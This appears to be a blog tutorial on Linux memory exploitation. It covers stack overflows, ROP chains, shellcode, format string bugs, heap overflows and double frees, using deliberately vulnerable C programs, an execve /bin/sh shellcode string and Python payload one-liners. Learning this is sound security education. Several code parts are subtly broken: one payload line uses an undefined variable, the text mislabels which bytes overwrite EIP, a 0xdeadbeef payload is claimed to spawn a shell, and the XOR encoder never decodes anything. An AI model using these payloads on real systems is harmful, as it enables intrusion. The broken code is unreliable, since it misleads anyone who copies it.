Mastering Memory Exploitation: Fundamentals, Stack Overflows, Shellcode, Format String Bugs, and Heap Overflows
In the world of cybersecurity, exploiting vulnerabilities is a technical art form that combines deep knowledge of systems with a practical approach to manipulating them. This article takes you from the foundations of memory management to advanced exploitation techniques like stack overflows, writing shellcode, exploiting format string vulnerabilities, and taking advantage of heap overflows. By the end of this guide, you’ll have both a theoretical understanding and hands-on experience with these techniques, making you a more effective vulnerability researcher.
Before You Begin: Understanding the Core Concepts
Memory Management Refresher
Memory is a crucial aspect of software exploitation, and before diving into more advanced techniques, it’s essential to understand how it is managed in a typical Linux environment. When a program runs, its memory is divided into different segments:
- Text Segment: Stores the program’s machine code.
- Data Segment: Holds global variables and static data.
- Heap: Dynamically allocated memory that grows upward.
- Stack: Stores local variables and function call information and grows downward.
The key areas for exploitation are the stack and heap, where you’ll see most vulnerabilities, such as overflows, heap corruption, and shellcode injections.
The Language of Exploits: Assembly
Assembly language lets you interact directly with hardware at a very low level. For Intel’s x86 architecture, you’ll encounter registers like EIP (Instruction Pointer) and ESP (Stack Pointer), which are vital in controlling a program’s execution. For stack-based vulnerabilities, controlling EIP is your golden ticket to executing arbitrary code. Knowing how C constructs translate into assembly is essential for reverse engineering and exploit development.
Stack Overflows: Overflowing Buffers for Control
Understanding the Stack
The stack is a LIFO (Last In, First Out) structure that is integral to handling function calls and storing local variables. When you call a function, arguments, return addresses, and local variables are pushed onto the stack. Since the stack is a tightly organized structure, overflowing a buffer can lead to overwriting important data, such as return addresses, which eventually allows us to hijack the execution flow.
Hands-On: Writing and Exploiting a Vulnerable Program
Let’s revisit a classic vulnerable program that reads user input using gets()
, a function notorious for allowing buffer overflows:
#include <stdio.h>
void return_input(void) {
char array[30];
gets(array);
printf("%s\n", array);
}
int main() {
return_input();
return 0;
}
Since gets()
doesn’t check the size of the input, if you provide more than 30 characters, it will overflow the buffer and potentially overwrite the return address, leading to arbitrary code execution.
Compile it with:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o overflow overflow.c
Now, try running the program with a large input:
$ ./overflow
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
This will likely cause a segmentation fault. Using GDB, you can examine how the stack is overwritten, and by carefully crafting input, you can take control of EIP.
gdb ./overflow
(gdb) break *0x080483d0 # set breakpoint before gets()
(gdb) run
(gdb) x/20x $esp # examine the stack
Once you locate EIP, you can overwrite it with a jump to your shellcode, leading us to the next section.
Once you’ve mastered basic stack-based buffer overflows and shellcode injection, you’ll inevitably encounter systems with protections like Non-Executable Stack (NX) or Data Execution Prevention (DEP). These protections prevent you from simply injecting and executing shellcode from the stack. However, this doesn’t mean all is lost — this is where Return-Oriented Programming (ROP) comes in.
What Is Return-Oriented Programming?
ROP allows you to execute code even on systems with NX/DEP enabled by reusing existing code in the program. Instead of injecting new code, you string together small pieces of existing code, called gadgets, that already reside in executable memory. Each gadget ends with a ret
instruction, allowing you to chain multiple gadgets together, ultimately bypassing memory protections.
Hands-On: Building a ROP Chain
Let’s take a vulnerable program compiled with NX enabled. We’ll locate useful gadgets in the program’s binary using a tool like ROPgadget:
ROPgadget --binary ./vulnerable_binary
You’ll see a list of gadgets like this:
0x080484ad : pop eax ; ret
0x080484b1 : pop ebx ; ret
0x080484b4 : pop ecx ; ret
By chaining these gadgets together, you can effectively simulate a shellcode execution without injecting new code. You would manipulate the stack to load the correct values into registers, calling the desired functions (like execve()
) to spawn a shell.
Adding ROP to your toolkit allows you to exploit even hardened systems, giving you far more versatility when dealing with modern software protections.
Shellcode: Writing Your Own Payloads
What Is Shellcode?
Shellcode is a small piece of assembly code that, when executed, gives you a shell or performs another malicious action. The goal in many exploits is to inject and execute shellcode to gain unauthorized control over a system.
Hands-On: Writing Basic Shellcode
Start by writing simple shellcode that uses system calls to exit a program. On Linux, syscalls are invoked using the int 0x80
instruction, and each syscall has a unique number (e.g., 1
for exit
).
Here’s some basic shellcode to exit a program:
section .text
global _start
_start:
xor eax, eax ; Clear EAX register
mov al, 1 ; Syscall number for exit
xor ebx, ebx ; Exit status
int 0x80 ; Interrupt to invoke syscall
Now, let’s write shellcode to spawn a shell:
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
This shellcode will execute /bin/sh
on a Linux machine. Once you have your shellcode, you can inject it into a vulnerable program like the one we wrote earlier, and use a carefully crafted buffer to jump to it by overwriting EIP.
Testing Your Shellcode
Using GDB, you can test if your shellcode works correctly. Load your vulnerable program and carefully inspect how your shellcode is injected and executed. A typical payload structure includes NOP sleds (\x90\x90...
), which pad the buffer and ensure that EIP lands somewhere within the shellcode.
When injecting shellcode into a vulnerable program, you’ll often run into input filters that prevent certain characters from being used, such as null bytes (\x00
) or newline characters (\x0a
). These filters can break your shellcode if they appear within it. To bypass these restrictions, we use encoded shellcode.
Hands-On: Writing Encoded Shellcode
Encoded shellcode transforms the original payload into a format that avoids forbidden characters. You’ll often see XOR encoding used for this purpose. Here’s an example of XOR-encoded shellcode:
section .text
global _start
_start:
xor eax, eax ; Clear register
mov al, 1 ; Syscall number for exit
xor ebx, ebx ; Exit status
int 0x80 ; System call
encoder:
xor byte [encoded_shellcode], 0xaa
jmp encoder_end
encoded_shellcode:
db 0xAA, 0x1A, 0xF0, 0xAC, 0x12 ; Encoded shellcode (example)
encoder_end:
By XOR-ing the shellcode with a known value (e.g., 0xaa
), we can encode and later decode the payload in a way that avoids problematic bytes. This method helps ensure your payload works even in heavily filtered environments.
Format String Bugs: Exploiting Misformatted Input
What Is a Format String Vulnerability?
A format string vulnerability occurs when user input is passed directly to a function like printf()
without proper sanitization. This gives attackers the ability to read or write arbitrary memory locations, making it a powerful exploit.
Consider the following vulnerable program:
#include <stdio.h>
void vulnerable_function(char *input) {
printf(input); // Dangerous use of printf
}
int main(int argc, char **argv) {
if (argc > 1) {
vulnerable_function(argv[1]);
}
return 0;
}
Here, the format string provided by the user is passed directly to printf()
, which expects a format specifier like %s
or %x
. However, if the user supplies something unexpected, like %x%x%x
, the function will print memory contents.
Hands-On: Exploiting a Format String Bug
Run the program with malicious input:
$ ./format_vuln %x%x%x
This will print memory addresses from the stack. You can also use %n
to write values to memory, leading to even more dangerous exploits.
With enough control over the format string, you can use it to overwrite return addresses or function pointers, redirecting program execution to your shellcode.
Heap Overflows: Corrupting the Heap for Exploitation
Understanding the Heap
The heap is a region of memory used for dynamic memory allocation, and it grows upward, unlike the stack. Functions like malloc()
and free()
allocate and free memory from the heap. Heap overflows occur when you write more data to a heap-allocated buffer than it can hold, corrupting adjacent memory or heap management structures.
Heap overflows are typically harder to exploit than stack overflows because of the heap’s complex structure, but they can still lead to powerful exploits if done correctly.
Hands-On: Writing a Heap Overflow Vulnerable Program
Consider the following example where we allocate two heap buffers and overflow the first buffer to overwrite data in the second buffer:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main() {
char *buffer1 = (char *)malloc(16);
char *buffer2 = (char *)malloc(16);
strcpy(buffer1, "AAAAAAAAAAAAAAAAAAAA"); // Overflow buffer1
printf("Buffer2: %s\n", buffer2);
free(buffer1);
free(buffer2);
return 0;
}
In this program, the buffer overflow in buffer1
overwrites memory beyond its allocated space, corrupting buffer2
. Compile and run it:
$ gcc -o heap_overflow heap_overflow.c
$ ./heap_overflow
You can observe how buffer2
gets corrupted, which could be leveraged to overwrite control structures in the heap, such as function pointers or heap metadata, leading to code execution.
While heap overflows are common, another dangerous vulnerability related to dynamic memory management is double free. This occurs when a program attempts to free the same memory twice, leading to heap corruption and potential arbitrary code execution.
What Is a Double Free Vulnerability?
In many cases, freeing the same memory block multiple times allows an attacker to manipulate the heap’s internal structures, particularly the free list, which tracks available memory blocks. By corrupting this list, you can cause future malloc()
calls to return pointers to attacker-controlled memory.
Hands-On: Triggering a Double Free
Consider the following vulnerable program:
#include <stdlib.h>
int main() {
char *buffer = (char *)malloc(32);
free(buffer);
free(buffer); // Double free!
return 0;
}
When compiled and executed, this program crashes due to the double free. However, with careful exploitation, you could manipulate heap metadata and gain control over a critical function pointer.
Compile and test the program:
gcc -o double_free double_free.c
./double_free
In a more complex scenario, triggering a double free could allow you to overwrite the next chunk pointer or redirect execution to an attacker-controlled location, resulting in code execution.
Advanced Heap Exploitation: Understanding Metadata Corruption
Heap allocators, like those used in glibc, maintain metadata about the heap in structures called bins. By overflowing a buffer, you can corrupt this metadata, leading to dangerous behavior like arbitrary memory writes or execution of attacker-controlled code.
Tools like Valgrind and GDB are helpful for analyzing heap overflows and tracing heap corruptions in real-time. Once you understand the layout of the heap and how its metadata is managed, you can craft an overflow to control the program’s execution flow.
Let’s get start!
Step 1: Setting Up the Environment
1.1 Install Required Tools
Before starting, ensure you have the following tools installed on your Linux machine:
- GCC (GNU Compiler Collection): To compile our vulnerable program.
- GDB (GNU Debugger): To debug the program and inspect memory.
- Python: For crafting payloads.
- pwntools (optional): A Python library to help with exploit development (useful later).
You can install these tools with:
sudo apt update
sudo apt install gcc gdb python3 python3-pip
pip3 install pwntools
Step 2: Writing a Vulnerable Program
Let’s create a simple C program that is vulnerable to a stack-based buffer overflow. We will use the unsafe gets()
function to read user input without bounds checking, leading to a potential buffer overflow.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void vulnerable_function() {
char buffer[64]; // Stack buffer with limited size
printf("Enter some input:\n");
gets(buffer); // Vulnerable function: gets() doesn't check input size
printf("You entered: %s\n", buffer);
}
int main() {
vulnerable_function();
return 0;
}
2.1 Compile the Program
When compiling, we’ll disable stack protections (like canaries and stack guards) to make exploitation easier:
gcc -fno-stack-protector -z execstack -o vuln_program vuln_program.c
The -fno-stack-protector
flag disables the stack protector, and -z execstack
makes the stack executable (allowing shellcode to be run).
Step 3: Analyze the Program and Trigger the Vulnerability
3.1 Run the Program
Run the program normally to understand its behavior:
./vuln_program
It will ask you to enter input. Since the buffer is only 64 bytes, inputting more than that will overflow it. For now, input:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
You should see the program crash with a segmentation fault. The overflow has likely overwritten part of the stack.
3.2 Use GDB to Inspect the Stack
Now, let’s use GDB to examine the memory and see what’s happening under the hood:
gdb ./vuln_program
Set a breakpoint just before the gets()
function to inspect memory before the overflow:
(gdb) break gets
(gdb) run
Once the program pauses at the breakpoint, inspect the stack using:
(gdb) info registers
(gdb) x/20x $esp # View the top of the stack
Now, input the same long string again (64 A's
), and observe how the memory changes. You’ll notice that the data you input starts overwriting the stack, including the saved return address.
Step 4: Controlling EIP (Instruction Pointer)
The goal of a stack-based buffer overflow is to overwrite the EIP (Instruction Pointer), which controls what the program will execute next. By providing more input than the buffer can hold, you can overwrite EIP and redirect execution to your payload (shellcode).
4.1 Find the Offset to EIP
To control EIP, you need to know how many bytes to input before reaching the saved return address on the stack. You can use pattern generation to find the exact offset:
python3 -c 'print("A" * 80)' | ./vuln_program
In GDB, inspect where the crash occurred:
(gdb) info registers # Check the value of EIP
You should see that EIP is overwritten with part of the input. Adjust the number of A
s until you find the exact offset that overwrites EIP.
Step 5: Writing Shellcode
Once you control EIP, the next step is to redirect execution to your shellcode, which will spawn a shell. Here’s some simple Linux shellcode that spawns /bin/sh
:
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
5.1 Create a Payload
You can combine this shellcode with your exploit using a NOP sled to increase the chances of landing on the shellcode. First, find the location of the buffer in memory using GDB, then create the payload in Python:
python3 -c 'print("\x90" * 20 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "A" * (64 - 20 - len(shellcode)) + "BBBB" + "\x00\x80\x04\x08")' | ./vuln_program
- The NOP sled (
\x90
* 20) helps ensure that EIP will land somewhere in the shellcode. - The buffer is padded with
A
characters until it reaches the length of the buffer. - The
BBBB
overwrites EIP with the address of the NOP sled, which directs execution to the shellcode.
Step 6: Exploiting the Program
Run the program with your exploit payload:
python3 -c 'print("A" * 64 + "\xef\xbe\xad\xde")' | ./vuln_program
If everything is set up correctly, you should see that the program has been successfully exploited, and it spawns a shell.
Comments
Post a Comment